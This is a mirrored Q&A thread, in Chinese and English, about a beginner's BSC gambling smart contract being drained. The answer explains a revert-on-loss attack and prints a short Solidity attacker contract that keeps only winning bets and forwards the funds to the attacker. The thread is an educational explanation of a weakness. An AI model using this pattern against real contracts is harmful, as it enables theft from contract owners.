合同余额被清空。有趣的是它是如何完成的。

huangapple go评论66阅读模式
英文:

Contract balance was drained. Interesting a way how it was done

问题

我刚刚开始深入研究智能合约。为了学习的最佳方式,除了阅读文档和观看视频之外,我决定创建一个简单的赌博智能合约。有49%的概率你会将发送到智能合约的金额加倍。

函数包括:play(玩)、topUp(充值)和withdraw(仅供合同所有者使用)。以下是合同的代码链接:

https://bscscan.com/address/0x7d4bD89A37b15D5373B9405c56CF0F18f1A0929B#code

我知道可能存在漏洞,比如重入攻击和函数random(),矿工可能会操纵它,但因为这只是一个测试合同,没有人知道它,所以我没有太担心。

我为合同余额充值了0.3 BNB,并进行了一些测试交易,你可以在这里看到:

https://bscscan.com/address/0x7d4bD89A37b15D5373B9405c56CF0F18f1A0929B

经过所有测试,余额变成了0.32 BNB。然后突然变成了0。

我开始查看交易列表,但没有找到原因。然后我注意到另一个标签叫做“Internal Txns”(内部交易)。在那里,我注意到了两笔交易。第一笔交易正好是0.16 BNB发送到我的合同地址,所以他期望赢得并收到0.32 BNB(整个合同余额),他成功了。但据我了解,他是从他刚刚在玩之前部署的合同中执行的。所以我非常想知道它是如何被攻击的 - 是否是通过预测random()函数还是重入攻击或其他方式。我也很想知道他是如何找到我部署了仅约12小时的合同的。感谢任何答案!

有趣的是,确切的被攻击方式。

英文:

I am just began to diving into smart contracts. And as a best way to learn, along with reading documentation and watching videos, is create something, I decided to create simple gambling smart contract. With probability of 49% you'll double amount you've send to smart contract.
The functions are: play, topUp and withdraw(only for contract owner). Here is the code of the contract:

https://bscscan.com/address/0x7d4bD89A37b15D5373B9405c56CF0F18f1A0929B#code

I was aware about possible vulnerabilities like re-entracy attack and function random() which could may manipulated by miners, but as it was just a test contract and nobody knows about it, I don't worried about it too much.
I've topUp contract balance for 0.3 bnb and made some test transactions, which you can see here:

https://bscscan.com/address/0x7d4bD89A37b15D5373B9405c56CF0F18f1A0929B

After all tests balance was 0.32 BNB. And then suddenly became 0.
I've start watching transactions list, but nothing. Then I noticed another tab called Internal Txns. And there I noticed two transactions. First one exactly on 0.16 BNB to my contract address, so he expecting to win and receive 0.32 back (whole contract balance) and he did. But as I understand that he did it from his contract he had deployed just before play. So I am very interesting what exactly way it was committed - wether it random() function was predicted or was it an re-entrancy attack or anything else. And also very interesting how does he found my contract which was deployed only about 12 hours ago. Appreciate any answers!

Interesting exact way how it was compromised.

答案1

得分: 1

攻击者使用了一个合同,如果他没有赢得比赛,就会撤销交易。所以,如果他运气不好,他不会损失任何东西(只有燃气费,但他可以使用不在块中包括交易撤销的flashBot RPC)。

contract Attacker {
	address private doubleOrNothing  = ...; // 你的合同
    address private owner = ...;  // 攻击者的EOA
	
	function play() payable external {
		IDoubleOrNothing(doubleOrNothing).play{value: msg.value}();
		if (address(this).balance < msg.value) revert;
        owner.call{value: address(this).balance}();  // 发送所有余额给所有者
	}
}

攻击者可能会监视所有新部署的带有一些资金的合同,并手动检查它们是否可以被利用或其他情况。

英文:

The attacker used a contract that reverted the transaction if he didn't win. So if he would have got a bad RNG, he wouldn't have lost anything (only gas fees, but he could have used the flashBot RPC that doesn't include reverting transaction in a block).

contract Attacker {
	address private doubleOrNothing  = ...; // your contract
    address private owner = ...;  // the attacker EOA
	
	function play() payable external {
		IDoubleOrNothing(doubleOrNothing).play{value: msg.value}();
		if (address(this).balance &lt; msg.value) revert;
        owner.call{value: address(this).balance}();  // send all to owner
	}
}

I's possible that the attacker monitors all newly deployed contract with some money in them, and checks manually if they are exploitable or something.

huangapple
  • 本文由 发表于 2023年6月8日 16:50:06
  • 转载请务必保留本文链接:https://go.coder-hub.com/76430137.html
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

确定